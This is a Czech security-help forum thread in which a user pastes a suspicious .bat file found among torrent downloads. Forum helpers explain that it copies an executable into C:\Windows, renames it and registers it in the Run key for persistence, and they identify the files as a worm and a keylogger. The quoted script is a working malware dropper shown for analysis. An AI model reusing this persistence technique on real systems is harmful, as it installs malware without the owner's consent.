Dobrý den, našel jsem nějaký .bat soubor při svých stažených a otevřel jsem ho v notepadu++. Ukázal mi toto:
@echo off
XCOPY unistall.exe c:\windows\ /S /C /R /I /H /Y
RENAME c:\windows\unistall.exe winn.exe
reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winn /t REG_SZ /d c:\windows\winn.exe /f
start c:\windows\winn.exe
(Šel jsem tady jen proto, že jsem viděl "windows" a "uninstall")
Můžu vědět co to má jako dělat? (má to smazat Windows? [spouštět to raději nebudu])
Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz
Co to má dělat? (deivný .bat soubor ve složce od Torrentu)
Moderátor: Moderátoři
-
Rudy
- Site Admin
- Příspěvky: 119405
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Co to má dělat? (deivný .bat soubor ve složce od Torrent
Zdravím!
Pravděpodobně to spouští šmejda. winn.exe je totiž worm a unistall.exe (pokud jste tedy nevynechal jedno písmenko) je keylogger.
Pravděpodobně to spouští šmejda. winn.exe je totiž worm a unistall.exe (pokud jste tedy nevynechal jedno písmenko) je keylogger.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
-
Vrtule
- Přítel fóra
- Příspěvky: 328
- Registrován: 20 dub 2007 22:54
- Bydliště: Praha
- Kontaktovat uživatele:
Re: Co to má dělat? (deivný .bat soubor ve složce od Torrent
Zdravím,
ten .bat soubor se pokusí provést následující:
1) zkopírovat soubor uinstall.exe do složky C:\Windows,
2) přejmenovat jej na winn.exe,
3) zapsat cestu k winn.exe do registru tak, aby došlo k jeho spuštění (toho souboru) po startu systému,
4) spustit winn.exe (aby nebylo nutné čekat na restart).
ten .bat soubor se pokusí provést následující:
1) zkopírovat soubor uinstall.exe do složky C:\Windows,
2) přejmenovat jej na winn.exe,
3) zapsat cestu k winn.exe do registru tak, aby došlo k jeho spuštění (toho souboru) po startu systému,
4) spustit winn.exe (aby nebylo nutné čekat na restart).
GitHub (https://github.com/MartinDrab)
Přispějete na provoz fóra?